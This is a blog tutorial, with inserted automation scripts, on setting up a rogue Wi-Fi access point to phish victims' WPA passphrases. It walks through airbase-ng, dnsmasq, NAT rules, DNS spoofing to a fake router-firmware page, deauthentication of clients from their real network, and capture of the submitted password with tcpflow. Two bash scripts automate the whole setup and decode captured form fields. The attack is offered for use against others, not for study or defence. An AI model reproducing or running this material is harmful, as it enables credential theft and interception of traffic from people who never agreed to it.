by hash3liZer . 20 June 2018
In this tutorial I'll walk you through the basics of a Rogue Access Point and how it can be used to obtain a target's details by going after the clients rather than the Access Point itself. Brute-forcing and cracking with rainbow tables and dictionaries are good enough for many passwords, but they can't offer the credibility of a fake Access Point that the victim connects to on their own. That is where phishing comes in handy: by forging an entire network, which is a little nasty.
Phishing has always seemed like one of the most naive ways of getting your hands on someone's data, but in this case it takes a bit more work, as we will see. So, how does this work?
Phishing, broadly, means influencing someone into doing something they would not knowingly do. A Rogue Network has nothing special about it: it is just a plain (wireless) network with the most basic functionality, plus a forged page to which the network's web traffic is redirected. The whole point is to get our victims to see that page, whatever kind of page it is.
From Wikipedia's definition, a rogue access point is a wireless access point installed without the authorization of an administrator, whether by an attacker or by a well-meaning employee.
In our case, what we have to do in summary is this: first, launch a simple wireless Access Point; then give it addressing and DNS for its clients and, if needed, forward their Internet traffic; after that it is all a matter of hosting a phishing site and inducing the clients to interact with it. I hope you have the picture by now. A brief explanation with a picture:
Before you start, you will need an Internet connection to download a package or two. I am using Kali for all the testing and implementation, so it is easiest if you have Kali installed. On Ubuntu or another Linux distribution the package installation differs a little, but the process stays almost the same.
First, install the required packages, which in our case is just one, dnsmasq. The other tools we use are apache2, airbase-ng and aireplay-ng (both part of the aircrack-ng suite), dnsspoof (from the dsniff package), tcpflow and MySQL. Kali ships all of these already, so only dnsmasq is missing:
apt-get install dnsmasq
Now we need a wireless card that supports monitor mode and packet injection. Find your adapter's interface name and put it in monitor mode. In my case the interface is wlan1.
To, put it in monitor mode:
airmon-ng start wlan1
This puts the wireless card in monitor mode and renames it from wlan1 to wlan1mon. If airmon-ng warns about processes that could interfere (NetworkManager, wpa_supplicant), run airmon-ng check kill first, keeping in mind that this drops any Wi-Fi uplink the box was using.
Launch the wireless Access Point with airbase-ng, which is part of the aircrack-ng suite (not of airmon-ng). It lets you host APs with or without encryption and test how clients behave against various security configurations. Usage:
airbase-ng --essid "Access Point" -c 6 -P -vv wlan1mon
Note the above arguments: --essid sets the network name that is broadcast, -c 6 sets the channel, -P makes airbase-ng respond to every probe request regardless of the ESSID it asks for (so clients probing for remembered networks get an answer too), and -vv turns on verbose output.
airbase-ng also creates a TAP interface named atN, where N is a non-negative integer (at0 for the first instance). From here on the network is managed through at0 rather than through wlan1mon.
Now we have to give the access point an address plan and name resolution, so that clients get an IP address, can reach us and can resolve names. That is DHCP and DNS, which dnsmasq handles for us (routing itself is taken care of by the kernel once at0 has an address). Create a new configuration file for dnsmasq named dnsmasq.conf and paste in the following:
sudo nano dnsmasq.conf
interface=at0
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=126.96.36.199
log-queries
log-dhcp
listen-address=127.0.0.1
Note these parameters: interface=at0 binds dnsmasq to the AP's interface; dhcp-range hands out addresses from 192.168.1.2 to 192.168.1.30 with a 12-hour lease; dhcp-option=3 is the default gateway and dhcp-option=6 the DNS server that clients receive, both pointing at us (192.168.1.1); server= is the upstream resolver our dnsmasq forwards queries to (use any resolver your uplink can reach); log-queries and log-dhcp print every DNS query and every lease to the terminal, which is handy for watching what the victims' devices do. Start dnsmasq in the foreground (-d) with this file. at0 must already carry its 192.168.1.1 address (next step) for dnsmasq to serve that range, so if it complains that at0 has no address, assign the address and restart it:
sudo dnsmasq -C dnsmasq.conf -d
Assign the gateway address and netmask to the interface and add the routing table entry. The connected route for 192.168.1.0/24 is added automatically when the address is set, so the explicit route add is redundant but harmless:
ifconfig at0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
This next step is optional. It gives the victims Internet access, so they can use the rogue AP as a normal network while all of their traffic passes through you. Once clients route through us, MITM attacks such as ARP spoofing, DNS spoofing and plain sniffing are straightforward. Add firewall rules to NAT and forward the traffic (eth0 is the interface with the real Internet connection):
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
Note the two rules: the MASQUERADE rule in the nat table rewrites the source address of packets leaving eth0 to eth0's own address, so that replies come back to us, and the FORWARD rule accepts packets arriving on at0 for forwarding. Kali's default FORWARD policy is ACCEPT, so the replies coming back in on eth0 pass as well; if your policy is DROP, add a matching rule for eth0 to at0 with -m conntrack --ctstate RELATED,ESTABLISHED.
Now just one step to go: enable IP forwarding in the kernel (this setting does not survive a reboot).
echo 1 > /proc/sys/net/ipv4/ip_forward
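The steps so far, from monitor mode through IP forwarding, collected into one script with a matching teardown. This is an added example, not the post's own code. It assumes the same names used above (wlan1 / wlan1mon, at0, eth0, 192.168.1.1/24), an upstream resolver of 1.1.1.1 and a config path of /tmp/dnsmasq-rogue.conf, all overridable from the environment, and it uses ip instead of ifconfig. Run it as root with up to bring the rogue AP up and with down to kill airbase-ng and dnsmasq and remove the NAT and forwarding rules again; set DRYRUN=1 to print the commands instead of running them. With REDIRECT_ALL=1 the generated dnsmasq.conf also gets address=/#/192.168.1.1, which makes dnsmasq itself answer every DNS name with our address, an alternative to running a separate spoofer that races it for the reply.

```bash
#!/bin/sh
# Added example, not the original post's code. Brings the rogue AP up (or
# down) in one go. DRYRUN=1 prints every command instead of executing it.
# Assumed defaults: MON=wlan1mon, UPLINK=eth0, TAP=at0, GW=192.168.1.1,
# UPSTREAM_DNS=1.1.1.1; override them in the environment to match your box.
set -u

MON=${MON:-wlan1mon}               # monitor-mode interface airbase-ng uses
UPLINK=${UPLINK:-eth0}             # interface with the real Internet uplink
TAP=${TAP:-at0}                    # TAP interface created by airbase-ng
GW=${GW:-192.168.1.1}              # our address on $TAP; DHCP pool is its /24
ESSID=${ESSID:-"Access Point"}
CHANNEL=${CHANNEL:-6}
UPSTREAM_DNS=${UPSTREAM_DNS:-1.1.1.1}    # assumed public resolver
CONF=${CONF:-/tmp/dnsmasq-rogue.conf}
DRYRUN=${DRYRUN:-0}
REDIRECT_ALL=${REDIRECT_ALL:-0}    # 1 = resolve every name to $GW

# run: execute a command, or print it when DRYRUN=1.
run() {
    if [ "$DRYRUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# gen_dnsmasq_conf: the post's dnsmasq.conf, derived from $GW and $TAP.
# bind-interfaces keeps dnsmasq off port 53 of every other interface.
gen_dnsmasq_conf() {
    net=${GW%.*}
    printf '%s\n' \
        "interface=$TAP" \
        "bind-interfaces" \
        "dhcp-range=$net.2,$net.30,255.255.255.0,12h" \
        "dhcp-option=3,$GW" \
        "dhcp-option=6,$GW" \
        "server=$UPSTREAM_DNS" \
        "log-queries" \
        "log-dhcp"
    if [ "$REDIRECT_ALL" = 1 ]; then printf 'address=/#/%s\n' "$GW"; fi
}

# fw_rules: "table chain rule" per line, without the -A/-D verb, so that
# setup and teardown always add and delete exactly the same rules. The
# RELATED,ESTABLISHED rule only matters if the FORWARD policy is DROP.
fw_rules() {
    printf '%s\n' \
        "nat POSTROUTING -o $UPLINK -j MASQUERADE" \
        "filter FORWARD -i $TAP -o $UPLINK -j ACCEPT" \
        "filter FORWARD -i $UPLINK -o $TAP -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
}

# apply_fw -A|-D: append or delete every rule from fw_rules.
apply_fw() {
    fw_rules | while read -r table chain rest; do
        run iptables -t "$table" "$1" "$chain" $rest
    done
}

# setup: monitor mode, fake AP, address on $TAP, forwarding, NAT, dnsmasq.
setup() {
    [ "$DRYRUN" = 1 ] || [ "$(id -u)" = 0 ] || { echo "setup: run as root" >&2; return 1; }
    run airmon-ng start "${MON%mon}"          # wlan1mon -> wlan1
    run airbase-ng --essid "$ESSID" -c "$CHANNEL" -P -vv "$MON" &
    [ "$DRYRUN" = 1 ] || sleep 3              # give airbase-ng time to create $TAP
    run ip link set "$TAP" up
    run ip addr add "$GW/24" dev "$TAP"       # connected route is added with it
    run sysctl -w net.ipv4.ip_forward=1
    apply_fw -A
    gen_dnsmasq_conf > "$CONF"
    run dnsmasq -C "$CONF" -d
}

# teardown: stop the daemons and undo forwarding, NAT and monitor mode.
teardown() {
    [ "$DRYRUN" = 1 ] || [ "$(id -u)" = 0 ] || { echo "teardown: run as root" >&2; return 1; }
    run pkill -f "dnsmasq -C $CONF"           # only our dnsmasq, not NetworkManager's
    run pkill -x airbase-ng
    apply_fw -D
    run sysctl -w net.ipv4.ip_forward=0
    run airmon-ng stop "$MON"
}

case "${1:-}" in
    up)   setup ;;
    down) teardown ;;
esac
```

Usage: `./rogueap.sh up` (dnsmasq stays in the foreground, as in the post), then `./rogueap.sh down` from another terminal when you are done; `DRYRUN=1 ./rogueap.sh up` shows the command list without touching the system.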
What remains is the site. It is better to keep the code and scope minimal, and I'll keep things as simple as I can. We host a site on the apache web server and then present it to the target somehow; the main thing is getting hold of what is entered in its fields. We will see the real jargon in the subsequent steps, but for now let's stick to the site. Download this phishing site:
Unzip the file, which gives you a folder named RogueAP. Clear apache's default hosting directory and unpack the site into it:
rm -rf /var/www/html/*
unzip rogueap.zip -d /var/www/html
Check afterwards that the site's index page sits directly in /var/www/html; if the archive unpacked into /var/www/html/RogueAP instead, move that folder's contents up one level.
Kick-Start apache service:
systemctl start apache2
Make sure it started successfully:
service apache2 status
To ensure the site is hosted properly, browse to http://192.168.1.1 (from the Kali box or from a connected client) and make sure you can see the site. A screenshot of how it looks is given below:
Now we have to sniff the data that gets POSTed to the apache server. But before that, for maximum effect, we answer every DNS query from the clients with our own address, so that whatever site they type lands on the phishing page. Use dnsspoof from the dsniff package; without a hosts file it replies to every A query seen on at0 with the local machine's address:
dnsspoof -i at0
Note that this only works for plain-HTTP navigation. A site on the browser's HSTS preload list, or one the browser has already visited over HTTPS with HSTS set, will refuse to load over HTTP and show a certificate error instead of our page. On the other hand, phones and laptops send a captive-portal probe as soon as they associate, and since that probe resolves to us as well, many devices pop the phishing page up on their own. So the only thing left is tracking the passwords, for which we use tcpflow. Type in the following command (grep is line-buffered so the match shows up immediately instead of waiting in a pipe buffer):
sudo tcpflow -i any -C -g port 80 | grep --line-buffered -i "password1="
What happens here is that we capture all the HTTP traffic travelling through the network. Out of that traffic we need nothing but the one POST request to the local site that carries the passwords, so tcpflow prints each flow's data to the console (-C) and pipes it to grep, which filters for the line containing password1=, the name of the form's password field.
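Parsing the captured request instead of grepping for a substring, as an added example that is not the post's own code. It locates the urlencoded body of a POST request, splits it into fields and URL-decodes each one, so a passphrase containing spaces, '+' or '%' is recovered exactly as typed, where the grep above would show it encoded. The request it parses is constructed here for the example; the field names password1 and password2 are assumed to match the phishing form, and the script name in the usage note is made up.

```bash
#!/bin/sh
# Added example, not the original post's code: decode form fields from a
# captured HTTP POST, the job the tcpflow | grep pipeline does by eye.
# The captured request in sample_request is constructed for this example.

# urldecode: turn '+' into a space and each %XX into the byte it encodes.
urldecode() {
    printf '%s\n' "$1" | awk '
        BEGIN { hex = "0123456789abcdef" }
        {
            out = ""; n = length($0)
            for (i = 1; i <= n; i++) {
                c = substr($0, i, 1)
                if (c == "+") { out = out " "; continue }
                if (c == "%" && i + 2 <= n) {
                    h = tolower(substr($0, i + 1, 2))
                    hi = index(hex, substr(h, 1, 1)) - 1
                    lo = index(hex, substr(h, 2, 1)) - 1
                    if (hi >= 0 && lo >= 0) {
                        out = out sprintf("%c", hi * 16 + lo); i += 2; continue
                    }
                }
                out = out c
            }
            print out
        }'
}

# extract_fields: read HTTP request(s) on stdin and print the decoded
# name=value pairs of each x-www-form-urlencoded body, one per line.
# Headers (everything up to the first empty line of a request) are dropped;
# a new request line resets the state so tcpflow -C output can be streamed in.
extract_fields() {
    awk '/^(GET|POST|PUT) / { body = 0; next }
         body { print }
         /^\r?$/ { body = 1 }' \
    | tr '&' '\n' \
    | while IFS= read -r pair; do
        [ -n "$pair" ] || continue
        name=${pair%%=*}
        value=${pair#*=}
        if [ "$name" = "$pair" ]; then value=''; fi    # bare field without '='
        printf '%s=%s\n' "$(urldecode "$name")" "$(urldecode "$value")"
    done
}

# get_field NAME: print the decoded value of one field (e.g. password1) for
# every request on stdin, or nothing if the field never appears.
get_field() {
    extract_fields | awk -F= -v k="$1" '$1 == k { sub(/^[^=]*=/, ""); print }'
}

# sample_request: a constructed capture of the phishing form being submitted,
# as tcpflow -C would show it. Passphrase typed by the victim: p@ss word!1
sample_request() {
    printf 'POST /index.php HTTP/1.1\r\n'
    printf 'Host: 192.168.1.1\r\n'
    printf 'Content-Type: application/x-www-form-urlencoded\r\n'
    printf 'Content-Length: 51\r\n\r\n'
    printf 'password1=p%%40ss+word%%211&password2=p%%40ss+word%%211\n'
}

case "${1:-}" in
    demo)
        sample_request | extract_fields
        printf 'WPA passphrase: %s\n' "$(sample_request | get_field password1)"
        ;;
esac
```

Run `sh extract.sh demo` to see it work on the constructed request; for live use, source the file (`. ./extract.sh`) and run `tcpflow -i at0 -C port 80 | get_field password1`, which prints each submitted passphrase as it arrives.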
Now you can deauthenticate the target clients from their real AP and push them towards the Rogue AP. For that we use aireplay-ng; -0 0 sends deauthentication frames continuously (0 means no limit) and -a takes the BSSID of the legitimate AP. The card must be on the target AP's channel, and since airbase-ng is already using wlan1mon on its own channel, a second adapter is the usual setup for this part:
aireplay-ng -0 0 -a [BSSID of the real AP] [monitor interface]
A successful attack...
Over on the victim's side, suppose the client has connected to the Rogue AP and been redirected to the phishing site, which tells them that their router's firmware is out of date and needs updating. As soon as they enter the data in the password fields and submit it, we are notified on the tcpflow terminal:
So the captured WPA passphrase is password123.
So we have seen what a Fake (Rogue) access point is and how it can be used to steal someone's data on the fly. Rogue access points are sometimes difficult to set up and maintain, because you have to choose your wireless adapter carefully and it demands some knowledge of networking and servers. In this tutorial we saw only the most minimal usage. For more, keep reading and subscribe to our email newsletter.